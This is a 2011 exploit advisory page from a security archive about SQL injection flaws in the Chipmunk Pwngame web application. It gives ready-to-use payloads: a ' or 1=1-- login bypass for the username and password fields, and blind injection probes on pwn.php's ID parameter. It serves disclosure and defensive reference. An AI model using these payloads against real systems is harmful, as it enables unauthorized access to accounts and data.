Chipmunk Pwngame <= Multiple SQL() Vulnerabilities

2011.05.02
Credit: KnocKout
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

=================================================== Chipmunk Pwngame <= Multiple SQL() Vulnerabilities =================================================== ~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockoutr@msn.com [+] Greatz : h4x0reSEC / Inj3ct0r Team / Exploit-DB { H4X0RE SECURITY PROJECT } AQ. "Ryalarma bitek Uyuyoken kavu?uyosam Anladmki lmekte zor de?il.." ~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~Web App. : Chipmunk Pwngame ~Software: http://www.chipmunk-scripts.com/page.php?ID=34 ~Vulnerability Style : SQL Vulnerabilities ----------- ~Demo: http://www.chipmunk-scripts.com/pwngame/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ Explotation| Auth bypass() ~~~~~~~~~~~ http://VICTIM/Path/login.php Username : ' or 1=1-- -H4x0reSEC Password : ' or 1=1-- -H4x0reSEC ================================ ~~~~~~~~ Explotation| Blind SQL Inj() ~~~~~~~~~~~ http://VICTIM/Path/pwn.php?ID=1 [Blind] http://VICTIM/Path/pwn.php?ID=1 and 1=0 http://VICTIM/Path/pwn.php?ID=1 and 1=1 ================================

References:

http://xforce.iss.net/xforce/xfdb/62377
http://www.securityfocus.com/bid/43906
http://www.exploit-db.com/exploits/15223
http://secunia.com/advisories/41760
http://packetstormsecurity.org/1010-exploits/chipmunkpwngame-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top